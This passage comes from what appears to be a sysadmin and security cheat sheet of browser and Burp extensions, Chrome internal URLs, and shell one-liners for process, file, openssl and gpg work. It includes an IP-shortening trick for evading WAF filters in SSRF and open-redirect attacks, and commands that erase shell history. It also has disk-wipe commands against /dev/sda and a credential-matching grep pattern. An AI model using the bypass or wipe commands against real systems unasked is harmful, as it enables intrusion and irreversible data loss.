| **`1.1.1.1`** | [cloudflare.com](https://1.1.1.1/) |
| **`94.130.110.185`** | [dnsprivacy.at](https://dnsprivacy.at/) |
###### TOP Browser extensions
| <b><u>Extension name</u></b> | <b><u>Description</u></b> |
| :--- | :--- |
| **`IPvFoo`** | Display the server IP address and HTTPS information across all page elements. |
| **`FoxyProxy`** | Simplifies configuring browsers to access proxy-servers. |
| **`HTTPS Everywhere`** | Automatically use HTTPS security on many sites. |
| **`uMatrix`** | Point & click to forbid/allow any class of requests made by your browser. |
| **`uBlock Origin`** | An efficient blocker: easy on memory and CPU footprint. |
| **`Session Buddy`** | Manage browser tabs and bookmarks with ease. |
| **`SuperSorter`** | Sort bookmarks recursively, delete duplicates, merge folders, and more. |
| **`Clear Cache`** | Clear your cache and browsing data. |
| **`d3coder`** | Encoding/Decoding plugin for various types of encoding. |
| **`Web Developer`** | Adds a toolbar button with various web developer tools. |
| **`ThreatPinch Lookup`** | Add threat intelligence hover tool tips. |
###### TOP Burp extensions
| <b><u>Extension name</u></b> | <b><u>Description</u></b> |
| :--- | :--- |
| **`Active Scan++`** | Extends Burp's active and passive scanning capabilities. |
| **`Autorize`** | Automatically detects authorization enforcement. |
| **`AuthMatrix`** | A simple matrix grid to define the desired levels of access privilege. |
| **`Logger++`** | Logs requests and responses for all Burp tools in a sortable table. |
| **`Bypass WAF`** | Adds headers useful for bypassing some WAF devices. |
| **`JSON Beautifier`** | Beautifies JSON content in the HTTP message viewer. |
| **`JSON Web Tokens`** | Enables Burp to decode and manipulate JSON web tokens. |
| **`CSP Auditor`** | Displays CSP headers for responses, and passively reports CSP weaknesses. |
| **`CSP-Bypass`** | Passively scans for CSP headers that contain known bypasses. |
| **`Hackvertor`** | Converts data using a tag-based configuration to apply various encoding. |
| **`HTML5 Auditor`** | Scans for usage of risky HTML5 features. |
| **`Software Vulnerability Scanner`** | Vulnerability scanner based on vulners.com audit API. |
| **`Turbo Intruder`** | Is a powerful bruteforcing tool. |
| **`Upload Scanner`** | Upload a number of different file types, laced with different forms of payload. |
###### Hack Mozilla Firefox address bar
In Firefox's address bar, you can limit results by typing special characters before or after your term:
- `^` - for matches in your browsing history
- `*` - for matches in your bookmarks.
- `%` - for matches in your currently open tabs.
- `#` - for matches in page titles.
- `@` - for matches in web addresses.
###### Chrome hidden commands
- `chrome://chrome-urls` - list of all commands
- `chrome://flags` - enable experiments and development features
- `chrome://interstitials` - errors and warnings
- `chrome://net-internals` - network internals (events, dns, cache)
- `chrome://network-errors` - network errors
- `chrome://net-export` - start logging future network activity to a file
- `chrome://safe-browsing` - safe browsing options
- `chrome://user-actions` - record all user actions
- `chrome://restart` - restart chrome
- `chrome://dino` - ERR_INTERNET_DISCONNECTED...
- `cache:<website-address>` - view the cached version of the web page
###### Bypass WAFs by Shortening IP Address (by [0xInfection](https://twitter.com/0xInfection))
IP addresses can be shortened by dropping the zeroes:
```
http://1.0.0.1 → http://1.1
http://127.0.0.1 → http://127.1
http://192.168.0.1 → http://192.168.1
http://0xC0A80001 or http://3232235521 → 192.168.0.1
http://192.168.257 → 192.168.1.1
http://192.168.516 → 192.168.2.4
```
> This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted.
For more information please see [How to Obscure Any URL](http://www.pc-help.org/obscure.htm) and [Magic IP Address Shortcuts](https://stuff-things.net/2014/09/25/magic-ip-address-shortcuts/).
###### Hashing, encryption and encoding (by [Michal Špaček](https://twitter.com/spazef0rze))
_Hashing_
plaintext :arrow_right: hash<br>
hash :no_entry: plaintext
_Symmetric encryption_
plaintext :arrow_right: :key: :arrow_right: ciphertext<br>
plaintext :arrow_left: :key: :arrow_left: ciphertext<br>
(:key: shared key)
_Asymmetric encryption_
plaintext :arrow_right: :key: :arrow_right: ciphertext<br>
plaintext :arrow_left: :part_alternation_mark: :arrow_left: ciphertext<br>
(:key: public key, :part_alternation_mark: private key)<br>
_Encoding_
text :arrow_right: encoded<br>
text :arrow_left: encoded
#### One-liners [<sup>[TOC]</sup>](#anger-table-of-contents)
##### Table of Contents
* [terminal](#tool-terminal)
* [busybox](#tool-busybox)
* [mount](#tool-mount)
* [fuser](#tool-fuser)
* [lsof](#tool-lsof)
* [ps](#tool-ps)
* [top](#tool-top)
* [vmstat](#tool-vmstat)
* [iostat](#tool-iostat)
* [strace](#tool-strace)
* [kill](#tool-kill)
* [find](#tool-find)
* [diff](#tool-diff)
* [vimdiff](#tool-vimdiff)
* [tail](#tool-tail)
* [cpulimit](#tool-cpulimit)
* [pwdx](#tool-pwdx)
* [tr](#tool-tr)
* [chmod](#tool-chmod)
* [who](#tool-who)
* [last](#tool-last)
* [screen](#tool-screen)
* [script](#tool-script)
* [du](#tool-du)
* [inotifywait](#tool-inotifywait)
* [openssl](#tool-openssl)
* [secure-delete](#tool-secure-delete)
* [dd](#tool-dd)
* [gpg](#tool-gpg)
* [system-other](#tool-system-other)
* [curl](#tool-curl)
* [httpie](#tool-httpie)
* [ssh](#tool-ssh)
* [linux-dev](#tool-linux-dev)
* [tcpdump](#tool-tcpdump)
* [tcpick](#tool-tcpick)
* [ngrep](#tool-ngrep)
* [hping3](#tool-hping3)
* [nmap](#tool-nmap)
* [netcat](#tool-netcat)
* [socat](#tool-socat)
* [p0f](#tool-p0f)
* [gnutls-cli](#tool-gnutls-cli)
* [netstat](#tool-netstat)
* [rsync](#tool-rsync)
* [host](#tool-host)
* [dig](#tool-dig)
* [certbot](#tool-certbot)
* [network-other](#tool-network-other)
* [git](#tool-git)
* [awk](#tool-awk)
* [sed](#tool-sed)
* [grep](#tool-grep)
* [perl](#tool-perl)
##### Tool: [terminal](https://en.wikipedia.org/wiki/Linux_console)
###### Reload shell without exit
```bash
exec $SHELL -l
```
###### Close shell keeping all subprocess running
```bash
disown -a && exit
```
###### Exit without saving shell history
```bash
kill -9 $$
unset HISTFILE && exit
```
###### Perform a branching conditional
```bash
true && echo success
false || echo failed
```
###### Pipe stdout and stderr to separate commands
```bash
some_command > >(/bin/cmd_for_stdout) 2> >(/bin/cmd_for_stderr)
```
###### Redirect stdout and stderr each to separate files and print both to the screen
```bash
(some_command 2>&1 1>&3 | tee errorlog ) 3>&1 1>&2 | tee stdoutlog
```
###### List of commands you use most often
```bash
history | \
awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a;}' | \
grep -v "./" | \
column -c3 -s " " -t | \
sort -nr | nl | head -n 20
```
###### Sterilize bash history
```bash
function sterile() {
history | awk '$2 != "history" { $1=""; print $0 }' | egrep -vi "\
curl\b+.*(-E|--cert)\b+.*\b*|\
curl\b+.*--pass\b+.*\b*|\
curl\b+.*(-U|--proxy-user).*:.*\b*|\
curl\b+.*(-u|--user).*:.*\b*
.*(-H|--header).*(token|auth.*)\b+.*|\
wget\b+.*--.*password\b+.*\b*|\
http.?://.+:.+@.*\
" > $HOME/histbuff; history -r $HOME/histbuff;
}
export PROMPT_COMMAND="sterile"
```
> Look also: [A naive utility to censor credentials in command history](https://github.com/lbonanomi/go/blob/master/revisionist.go).
###### Quickly backup a file
```bash
cp filename{,.orig}
```
###### Empty a file (truncate to 0 size)
```bash
>filename
```
###### Delete all files in a folder that don't match a certain file extension
```bash
rm !(*.foo|*.bar|*.baz)
```
###### Pass multi-line string to a file
```bash
# cat >filename ... - overwrite the file
# cat >>filename ... - append to a file
cat > filename << __EOF__
data data data
__EOF__
```
###### Edit a file on a remote host using vim
```bash
vim scp://user@host//etc/fstab
```
###### Create a directory and change into it at the same time
```bash
mkd() { mkdir -p "$@" && cd "$@"; }
```
###### Convert uppercase files to lowercase files
```bash
rename 'y/A-Z/a-z/' *
```
###### Print a row of characters across the terminal
```bash
printf "%`tput cols`s" | tr ' ' '#'
```
###### Show shell history without line numbers
```bash
history | cut -c 8-
fc -l -n 1 | sed 's/^\s*//'
```
###### Run command(s) after exit session
```bash
cat > /etc/profile << __EOF__
_after_logout() {
username=$(whoami)
for _pid in $(ps afx | grep sshd | grep "$username" | awk '{print $1}') ; do
kill -9 $_pid
done
}
trap _after_logout EXIT
__EOF__
```
###### Generate a sequence of numbers
```bash
for ((i=1; i<=10; i+=2)) ; do echo $i ; done
# alternative: seq 1 2 10
for ((i=5; i<=10; ++i)) ; do printf '%02d\n' $i ; done
# alternative: seq -w 5 10
for i in {1..10} ; do echo $i ; done
```
###### Simple Bash filewatching
```bash
unset MAIL; export MAILCHECK=1; export MAILPATH='$FILE_TO_WATCH?$MESSAGE'
```
---
##### Tool: [busybox](https://www.busybox.net/)
###### Static HTTP web server
```bash
busybox httpd -p $PORT -h $HOME [-c httpd.conf]
```
___
##### Tool: [mount](https://en.wikipedia.org/wiki/Mount_(Unix))
###### Mount a temporary ram partition
```bash
mount -t tmpfs tmpfs /mnt -o size=64M
```
* `-t` - filesystem type
* `-o` - mount options
###### Remount a filesystem as read/write
```bash
mount -o remount,rw /
```
___
##### Tool: [fuser](https://en.wikipedia.org/wiki/Fuser_(Unix))
###### Show which processes use the files/directories
```bash
fuser /var/log/daemon.log
fuser -v /home/supervisor
```
###### Kills a process that is locking a file
```bash
fuser -ki filename
```
* `-i` - interactive option
###### Kills a process that is locking a file with specific signal
```bash
fuser -k -HUP filename
```
* `--list-signals` - list available signal names
###### Show what PID is listening on specific port
```bash
fuser -v 53/udp
```
###### Show all processes using the named filesystems or block device
```bash
fuser -mv /var/www
```
___
##### Tool: [lsof](https://en.wikipedia.org/wiki/Lsof)
###### Show process that use internet connection at the moment
```bash
lsof -P -i -n
```
###### Show process that use specific port number
```bash
lsof -i tcp:443
```
###### Lists all listening ports together with the PID of the associated process
```bash
lsof -Pan -i tcp -i udp
```
###### List all open ports and their owning executables
```bash
lsof -i -P | grep -i "listen"
```
###### Show all open ports
```bash
lsof -Pnl -i
```
###### Show open ports (LISTEN)
```bash
lsof -Pni4 | grep LISTEN | column -t
```
###### List all files opened by a particular command
```bash
lsof -c "process"
```
###### View user activity per directory
```bash
lsof -u username -a +D /etc
```
###### Show 10 largest open files
```bash
lsof / | \
awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | \
sort -n -u | tail | column -t
```
###### Show current working directory of a process
```bash
lsof -p <PID> | grep cwd
```
___
##### Tool: [ps](https://en.wikipedia.org/wiki/Ps_(Unix))
###### Show a 4-way scrollable process tree with full details
```bash
ps awwfux | less -S
```
###### Processes per user counter
```bash
ps hax -o user | sort | uniq -c | sort -r
```
###### Show all processes by name with main header
```bash
ps -lfC nginx
```
___
##### Tool: [find](https://en.wikipedia.org/wiki/Find_(Unix))
###### Find files that have been modified on your system in the past 60 minutes
```bash
find / -mmin 60 -type f
```
###### Find all files larger than 20M
```bash
find / -type f -size +20M
```
###### Find duplicate files (based on MD5 hash)
```bash
find -type f -exec md5sum '{}' ';' | sort | uniq --all-repeated=separate -w 33
```
###### Change permission only for files
```bash
cd /var/www/site && find . -type f -exec chmod 766 {} \;
cd /var/www/site && find . -type f -exec chmod 664 {} +
```
###### Change permission only for directories
```bash
cd /var/www/site && find . -type d -exec chmod g+x {} \;
cd /var/www/site && find . -type d -exec chmod g+rwx {} +
```
###### Find files and directories for specific user/group
```bash
# User:
find . -user <username> -print
find /etc -type f -user <username> -name "*.conf"
# Group:
find /opt -group <group>
find /etc -type f -group <group> -iname "*.conf"
```
###### Find files and directories for all without specific user/group
```bash
# User:
find . \! -user <username> -print
# Group:
find . \! -group <group>
```
###### Looking for files/directories that only have certain permission
```bash
# User
find . -user <username> -perm -u+rw # -rw-r--r--
find /home -user $(whoami) -perm 777 # -rwxrwxrwx
# Group:
find /home -type d -group <group> -perm 755 # -rwxr-xr-x
```
###### Delete older files than 60 days
```bash
find . -type f -mtime +60 -delete
```
###### Recursively remove all empty sub-directories from a directory
```bash
find . -depth -type d -empty -exec rmdir {} \;
```
###### How to find all hard links to a file
```bash
find </path/to/dir> -xdev -samefile filename
```
###### Recursively find the latest modified files
```bash
find . -type f -exec stat --format '%Y :%y %n' "{}" \; | sort -nr | cut -d: -f2- | head
```
###### Recursively find/replace of a string with sed
```bash
find . -not -path '*/\.git*' -type f -print0 | xargs -0 sed -i 's/foo/bar/g'
```
###### Recursively find/replace of a string in directories and file names
```bash
find . -depth -name '*test*' -execdir bash -c 'mv -v "$1" "${1//foo/bar}"' _ {} \;
```
###### Recursively find suid executables
```bash
find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;
```
___
##### Tool: [top](https://en.wikipedia.org/wiki/Top_(software))
###### Use top to monitor only all processes with the specific string
```bash
top -p $(pgrep -d , <str>)
```
* `<str>` - process containing string (eg. nginx, worker)
___
##### Tool: [vmstat](https://en.wikipedia.org/wiki/Vmstat)
###### Show current system utilization (fields in kilobytes)
```bash
vmstat 2 20 -t -w
```
* `2` - number of times with a defined time interval (delay)
* `20` - each execution of the command (count)
* `-t` - show timestamp
* `-w` - wide output
* `-S M` - output of the fields in megabytes instead of kilobytes
###### Show current system utilization will get refreshed every 5 seconds
```bash
vmstat 5 -w
```
###### Display report a summary of disk operations
```bash
vmstat -D
```
###### Display report of event counters and memory stats
```bash
vmstat -s
```
###### Display report about kernel objects stored in slab layer cache
```bash
vmstat -m
```
##### Tool: [iostat](https://en.wikipedia.org/wiki/Iostat)
###### Show information about the CPU usage, and I/O statistics about all the partitions
```bash
iostat 2 10 -t -m
```
* `2` - number of times with a defined time interval (delay)
* `10` - each execution of the command (count)
* `-t` - show timestamp
* `-m` - fields in megabytes (`-k` - in kilobytes, default)
###### Show information only about the CPU utilization
```bash
iostat 2 10 -t -m -c
```
###### Show information only about the disk utilization
```bash
iostat 2 10 -t -m -d
```
###### Show information only about the LVM utilization
```bash
iostat -N
```
___
##### Tool: [strace](https://en.wikipedia.org/wiki/Strace)
###### Track with child processes
```bash
# 1)
strace -f -p $(pidof glusterfsd)
# 2)
strace -f $(pidof php-fpm | sed 's/\([0-9]*\)/\-p \1/g')
```
###### Track process with 30 seconds limit
```bash
timeout 30 strace $(< /var/run/zabbix/zabbix_agentd.pid)
```
###### Track processes and redirect output to a file
```bash
ps auxw | grep '[a]pache' | awk '{print " -p " $2}' | \
xargs strace -o /tmp/strace-apache-proc.out
```
###### Track with print time spent in each syscall and limit length of print strings
```bash
ps auxw | grep '[i]init_policy' | awk '{print " -p " $2}' | \
xargs strace -f -e trace=network -T -s 10000
```
###### Track the open request of a network port
```bash
strace -f -e trace=bind nc -l 80
```
###### Track the open request of a network port (show TCP/UDP)
```bash
strace -f -e trace=network nc -lu 80
```
___
##### Tool: [kill](https://en.wikipedia.org/wiki/Kill_(command))
###### Kill a process running on port
```bash
kill -9 $(lsof -i :<port> | awk '{l=$2} END {print l}')
```
___
##### Tool: [diff](https://en.wikipedia.org/wiki/Diff)
###### Compare two directory trees
```bash
diff <(cd directory1 && find | sort) <(cd directory2 && find | sort)
```
###### Compare output of two commands
```bash
diff <(cat /etc/passwd) <(cut -f2 /etc/passwd)
```
___
##### Tool: [vimdiff](http://vimdoc.sourceforge.net/htmldoc/diff.html)
###### Highlight the exact differences, based on characters and words
```bash
vimdiff file1 file2
```
###### Compare two JSON files
```bash
vimdiff <(jq -S . A.json) <(jq -S . B.json)
```
###### Compare Hex dump
```bash
d(){ vimdiff <(f $1) <(f $2);};f(){ hexdump -C $1|cut -d' ' -f3-|tr -s ' ';}; d ~/bin1 ~/bin2
```
###### diffchar
Save [diffchar](https://raw.githubusercontent.com/vim-scripts/diffchar.vim/master/plugin/diffchar.vim) @ `~/.vim/plugins`
Click `F7` to switch between diff modes
Usefull `vimdiff` commands:
* `qa` to exit all windows
* `:vertical resize 70` to resize window
* set window width `Ctrl+W [N columns]+(Shift+)<\>`
___
##### Tool: [tail](https://en.wikipedia.org/wiki/Tail_(Unix))
###### Annotate tail -f with timestamps
```bash
tail -f file | while read ; do echo "$(date +%T.%N) $REPLY" ; done
```
###### Analyse an Apache access log for the most common IP addresses
```bash
tail -10000 access_log | awk '{print $1}' | sort | uniq -c | sort -n | tail
```
###### Analyse web server log and show only 5xx http codes
```bash
tail -n 100 -f /path/to/logfile | grep "HTTP/[1-2].[0-1]\" [5]"
```
___
##### Tool: [tar](https://en.wikipedia.org/wiki/Tar_(computing))
###### System backup with exclude specific directories
```bash
cd /
tar -czvpf /mnt/system$(date +%d%m%Y%s).tgz --directory=/ \
--exclude=proc/* --exclude=sys/* --exclude=dev/* --exclude=mnt/* .
```
###### System backup with exclude specific directories (pigz)
```bash
cd /
tar cvpf /backup/snapshot-$(date +%d%m%Y%s).tgz --directory=/ \
--exclude=proc/* --exclude=sys/* --exclude=dev/* \
--exclude=mnt/* --exclude=tmp/* --use-compress-program=pigz .
```
___
##### Tool: [dump](https://en.wikipedia.org/wiki/Dump_(program))
###### System backup to file
```bash
dump -y -u -f /backup/system$(date +%d%m%Y%s).lzo /
```
###### Restore system from lzo file
```bash
cd /
restore -rf /backup/system$(date +%d%m%Y%s).lzo
```
___
##### Tool: [cpulimit](http://cpulimit.sourceforge.net/)
###### Limit the cpu usage of a process
```bash
cpulimit -p pid -l 50
```
___
##### Tool: [pwdx](https://www.cyberciti.biz/faq/unix-linux-pwdx-command-examples-usage-syntax/)
###### Show current working directory of a process
```bash
pwdx <pid>
```
___
##### Tool: [taskset](https://www.cyberciti.biz/faq/taskset-cpu-affinity-command/)
###### Start a command on only one CPU core
```bash
taskset -c 0 <command>
```
___
##### Tool: [tr](https://en.wikipedia.org/wiki/Tr_(Unix))
###### Show directories in the PATH, one per line
```bash
tr : '\n' <<<$PATH
```
___
##### Tool: [chmod](https://en.wikipedia.org/wiki/Chmod)
###### Remove executable bit from all files in the current directory
```bash
chmod -R -x+X *
```
###### Restore permission for /bin/chmod
```bash
# 1:
cp /bin/ls chmod.01
cp /bin/chmod chmod.01
./chmod.01 700 file
# 2:
/bin/busybox chmod 0700 /bin/chmod
# 3:
setfacl --set u::rwx,g::---,o::--- /bin/chmod
```
___
##### Tool: [who](https://en.wikipedia.org/wiki/Who_(Unix))
###### Find last reboot time
```bash
who -b
```
###### Detect a user sudo-su'd into the current shell
```bash
[[ $(who -m | awk '{ print $1 }') == $(whoami) ]] || echo "You are su-ed to $(whoami)"
```
___
##### Tool: [last](https://www.howtoforge.com/linux-last-command/)
###### Was the last reboot a panic?
```bash
(last -x -f $(ls -1t /var/log/wtmp* | head -2 | tail -1); last -x -f /var/log/wtmp) | \
grep -A1 reboot | head -2 | grep -q shutdown && echo "Expected reboot" || echo "Panic reboot"
```
___
##### Tool: [screen](https://en.wikipedia.org/wiki/GNU_Screen)
###### Start screen in detached mode
```bash
screen -d -m <command>
```
###### Attach to an existing screen session
```bash
screen -r -d <pid>
```
___
##### Tool: [script](https://en.wikipedia.org/wiki/Script_(Unix))
###### Record and replay terminal session
```bash
### Record session
# 1)
script -t 2>~/session.time -a ~/session.log
# 2)
script --timing=session.time session.log
### Replay session
scriptreplay --timing=session.time session.log
```
___
##### Tool: [du](https://en.wikipedia.org/wiki/GNU_Screen)
###### Show 20 biggest directories with 'K M G'
```bash
du | \
sort -r -n | \
awk '{split("K M G",v); s=1; while($1>1024){$1/=1024; s++} print int($1)" "v[s]"\t"$2}' | \
head -n 20
```
___
##### Tool: [inotifywait](https://en.wikipedia.org/wiki/GNU_Screen)
###### Init tool everytime a file in a directory is modified
```bash
while true ; do inotifywait -r -e MODIFY dir/ && ls dir/ ; done;
```
___
##### Tool: [openssl](https://www.openssl.org/)
###### Testing connection to the remote host
```bash
echo | openssl s_client -connect google.com:443 -showcerts
```
###### Testing connection to the remote host (debug mode)
```bash
echo | openssl s_client -connect google.com:443 -showcerts -tlsextdebug -status
```
###### Testing connection to the remote host (with SNI support)
```bash
echo | openssl s_client -showcerts -servername google.com -connect google.com:443
```
###### Testing connection to the remote host with specific ssl version
```bash
openssl s_client -tls1_2 -connect google.com:443
```
###### Testing connection to the remote host with specific ssl cipher
```bash
openssl s_client -cipher 'AES128-SHA' -connect google.com:443
```
###### Verify 0-RTT
```bash
_host="example.com"
cat > req.in << __EOF__
HEAD / HTTP/1.1
Host: $_host
Connection: close
__EOF__
openssl s_client -connect ${_host}:443 -tls1_3 -sess_out session.pem -ign_eof < req.in
openssl s_client -connect ${_host}:443 -tls1_3 -sess_in session.pem -early_data req.in
```
###### Generate private key without passphrase
```bash
# _len: 2048, 4096
( _fd="private.key" ; _len="2048" ; \
openssl genrsa -out ${_fd} ${_len} )
```
###### Generate private key with passphrase
```bash
# _ciph: des3, aes128, aes256
# _len: 2048, 4096
( _ciph="aes128" ; _fd="private.key" ; _len="2048" ; \
openssl genrsa -${_ciph} -out ${_fd} ${_len} )
```
###### Remove passphrase from private key
```bash
( _fd="private.key" ; _fd_unp="private_unp.key" ; \
openssl rsa -in ${_fd} -out ${_fd_unp} )
```
###### Encrypt existing private key with a passphrase
```bash
# _ciph: des3, aes128, aes256
( _ciph="aes128" ; _fd="private.key" ; _fd_pass="private_pass.key" ; \
openssl rsa -${_ciph} -in ${_fd} -out ${_fd_pass}
```
###### Check private key
```bash
( _fd="private.key" ; \
openssl rsa -check -in ${_fd} )
```
###### Get public key from private key
```bash
( _fd="private.key" ; _fd_pub="public.key" ; \
openssl rsa -pubout -in ${_fd} -out ${_fd_pub} )
```
###### Generate private key and CSR
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; _len="2048" ; \
openssl req -out ${_fd_csr} -new -newkey rsa:${_len} -nodes -keyout ${_fd} )
```
###### Generate CSR
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; \
openssl req -out ${_fd_csr} -new -key ${_fd} )
```
###### Generate CSR (metadata from existing certificate)
> Where `private.key` is the existing private key. As you can see you do not generate this CSR from your certificate (public key). Also you do not generate the "same" CSR, just a new one to request a new certificate.
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; _fd_crt="cert.crt" ; \
openssl x509 -x509toreq -in ${_fd_crt} -out ${_fd_csr} -signkey ${_fd} )
```
###### Generate CSR with -config param
```bash
( _fd="private.key" ; _fd_csr="request.csr" ; \
openssl req -new -sha256 -key ${_fd} -out ${_fd_csr} \
-config <(
cat << __EOF__
[req]
default_bits = 2048
default_md = sha256
prompt = no
distinguished_name = dn
req_extensions = req_ext
[ dn ]
C = "<two-letter ISO abbreviation for your country>"
ST = "<state or province where your organisation is legally located>"
L = "<city where your organisation is legally located>"
O = "<legal name of your organisation>"
OU = "<section of the organisation>"
CN = "<fully qualified domain name>"
[ req_ext ]
subjectAltName = @alt_names
[ alt_names ]
DNS.1 = <fully qualified domain name>
DNS.2 = <next domain>
DNS.3 = <next domain>
__EOF__
))
```
Other values in `[ dn ]`:
```
countryName = "DE" # C=
stateOrProvinceName = "Hessen" # ST=
localityName = "Keller" # L=
postalCode = "424242" # L/postalcode=
postalAddress = "Keller" # L/postaladdress=
streetAddress = "Crater 1621" # L/street=
organizationName = "apfelboymschule" # O=
organizationalUnitName = "IT Department" # OU=
commonName = "example.com" # CN=
emailAddress = "[email protected]" # CN/emailAddress=
```
Example of `oids` (you'll probably also have to make OpenSSL know about the new fields required for EV by adding the following under `[new_oids]`):
```
[req]
...
oid_section = new_oids
[ new_oids ]
postalCode = 2.5.4.17
streetAddress = 2.5.4.9
```
For more information please look at these great explanations:
- [RFC 5280](https://tools.ietf.org/html/rfc5280)
- [How to create multidomain certificates using config files](https://apfelboymchen.net/gnu/notes/openssl%20multidomain%20with%20config%20files.html)
- [Generate a multi domains certificate using config files](https://gist.github.com/romainnorberg/464758a6620228b977212a3cf20c3e08)
- [Your OpenSSL CSR command is out of date](https://expeditedsecurity.com/blog/openssl-csr-command/)
- [OpenSSL example configuration file](https://www.tbs-certificats.com/openssl-dem-server-cert.cnf)
###### List available EC curves
```bash
openssl ecparam -list_curves
```
###### Print ECDSA private and public keys
```bash
( _fd="private.key" ; \
openssl ec -in ${_fd} -noout -text )
# For x25519 only extracting public key
( _fd="private.key" ; _fd_pub="public.key" ; \
openssl pkey -in ${_fd} -pubout -out ${_fd_pub} )
```
###### Generate ECDSA private key
```bash
# _curve: prime256v1, secp521r1, secp384r1
( _fd="private.key" ; _curve="prime256v1" ; \
openssl ecparam -out ${_fd} -name ${_curve} -genkey )
# _curve: X25519
( _fd="private.key" ; _curve="x25519" ; \
openssl genpkey -algorithm ${_curve} -out ${_fd} )
```
###### Generate private key and CSR (ECC)
```bash
# _curve: prime256v1, secp521r1, secp384r1
( _fd="domain.com.key" ; _fd_csr="domain.com.csr" ; _curve="prime256v1" ; \
openssl ecparam -out ${_fd} -name ${_curve} -genkey ; \
openssl req -new -key ${_fd} -out ${_fd_csr} -sha256 )
```
###### Generate self-signed certificate
```bash
# _len: 2048, 4096
( _fd="domain.key" ; _fd_out="domain.crt" ; _len="2048" ; _days="365" ; \
openssl req -newkey rsa:${_len} -nodes \
-keyout ${_fd} -x509 -days ${_days} -out ${_fd_out} )
```
###### Generate self-signed certificate from existing private key
```bash
# _len: 2048, 4096
( _fd="domain.key" ; _fd_out="domain.crt" ; _days="365" ; \
openssl req -key ${_fd} -nodes \
-x509 -days ${_days} -out ${_fd_out} )
```
###### Generate self-signed certificate from existing private key and csr
```bash
# _len: 2048, 4096
( _fd="domain.key" ; _fd_csr="domain.csr" ; _fd_out="domain.crt" ; _days="365" ; \
openssl x509 -signkey ${_fd} -nodes \
-in ${_fd_csr} -req -days ${_days} -out ${_fd_out} )
```
###### Generate DH public parameters
```bash
( _dh_size="2048" ; \
openssl dhparam -out /etc/nginx/ssl/dhparam_${_dh_size}.pem "$_dh_size" )
```
###### Display DH public parameters
```bash
openssl pkeyparam -in dhparam.pem -text
```
###### Extract private key from pfx
```bash
( _fd_pfx="cert.pfx" ; _fd_key="key.pem" ; \
openssl pkcs12 -in ${_fd_pfx} -nocerts -nodes -out ${_fd_key} )
```
###### Extract private key and certs from pfx
```bash
( _fd_pfx="cert.pfx" ; _fd_pem="key_certs.pem" ; \
openssl pkcs12 -in ${_fd_pfx} -nodes -out ${_fd_pem} )
```
###### Extract certs from p7b
```bash
# PKCS#7 file doesn't include private keys.
( _fd_p7b="cert.p7b" ; _fd_pem="cert.pem" ; \
openssl pkcs7 -inform DER -outform PEM -in ${_fd_p7b} -print_certs > ${_fd_pem})
# or:
openssl pkcs7 -print_certs -in -in ${_fd_p7b} -out ${_fd_pem})
```
###### Convert DER to PEM
```bash
( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \
openssl x509 -in ${_fd_der} -inform der -outform pem -out ${_fd_pem} )
```
###### Convert PEM to DER
```bash
( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \
openssl x509 -in ${_fd_pem} -outform der -out ${_fd_der} )
```
###### Verification of the private key
```bash
( _fd="private.key" ; \
openssl rsa -noout -text -in ${_fd} )
```
###### Verification of the public key
```bash
# 1)
( _fd="public.key" ; \
openssl pkey -noout -text -pubin -in ${_fd} )
# 2)
( _fd="private.key" ; \
openssl rsa -inform PEM -noout -in ${_fd} &> /dev/null ; \
if [ $? = 0 ] ; then echo -en "OK\n" ; fi )
```
###### Verification of the certificate
```bash
( _fd="certificate.crt" ; # format: pem, cer, crt \
openssl x509 -noout -text -in ${_fd} )
```
###### Verification of the CSR
```bash
( _fd_csr="request.csr" ; \
openssl req -text -noout -in ${_fd_csr} )
```
###### Check the private key and the certificate are match
```bash
(openssl rsa -noout -modulus -in private.key | openssl md5 ; \
openssl x509 -noout -modulus -in certificate.crt | openssl md5) | uniq
```
###### Check the private key and the CSR are match
```bash
(openssl rsa -noout -modulus -in private.key | openssl md5 ; \
openssl req -noout -modulus -in request.csr | openssl md5) | uniq
```
___
##### Tool: [secure-delete](https://wiki.archlinux.org/index.php/Securely_wipe_disk)
###### Secure delete with shred
```bash
shred -vfuz -n 10 file
shred --verbose --random-source=/dev/urandom -n 1 /dev/sda
```
###### Secure delete with scrub
```bash
scrub -p dod /dev/sda
scrub -p dod -r file
```
###### Secure delete with badblocks
```bash
badblocks -s -w -t random -v /dev/sda
badblocks -c 10240 -s -w -t random -v /dev/sda
```
###### Secure delete with secure-delete
```bash
srm -vz /tmp/file
sfill -vz /local
sdmem -v
swapoff /dev/sda5 && sswap -vz /dev/sda5
```
___
##### Tool: [dd](https://en.wikipedia.org/wiki/Dd_(Unix))
###### Show dd status every so often
```bash
dd <dd_params> status=progress
watch --interval 5 killall -USR1 dd
```
###### Redirect output to a file with dd
```bash
echo "string" | dd of=filename
```
___
##### Tool: [gpg](https://www.gnupg.org/)
###### Export public key
```bash
gpg --export --armor "<username>" > username.pkey
```
* `--export` - export all keys from all keyrings or specific key
* `-a|--armor` - create ASCII armored output
###### Encrypt file
```bash
gpg -e -r "<username>" dump.sql
```
* `-e|--encrypt` - encrypt data
* `-r|--recipient` - encrypt for specific <username>
###### Decrypt file
```bash
gpg -o dump.sql -d dump.sql.gpg
```
* `-o|--output` - use as output file
* `-d|--decrypt` - decrypt data (default)
###### Search recipient
```bash
gpg --keyserver hkp://keyserver.ubuntu.com --search-keys "<username>"
```
* `--keyserver` - set specific key server
* `--search-keys` - search for keys on a key server
###### List all of the packets in an encrypted file
```bash
gpg --batch --list-packets archive.gpg
gpg2 --batch --list-packets archive.gpg
```
___
##### Tool: [system-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-system-other)
###### Reboot system from init
```bash
exec /sbin/init 6
```
###### Init system from single user mode
```bash
exec /sbin/init
```
###### Show current working directory of a process
```bash
readlink -f /proc/<PID>/cwd
```
###### Show actual pathname of the executed command
```bash
readlink -f /proc/<PID>/exe
```
##### Tool: [curl](https://curl.haxx.se)
```bash
curl -Iks https://www.google.com
```
* `-I` - show response headers only
* `-k` - insecure connection when using ssl
* `-s` - silent mode (not display body)
```bash
curl -Iks --location -X GET -A "x-agent" https://www.google.com
```
* `--location` - follow redirects
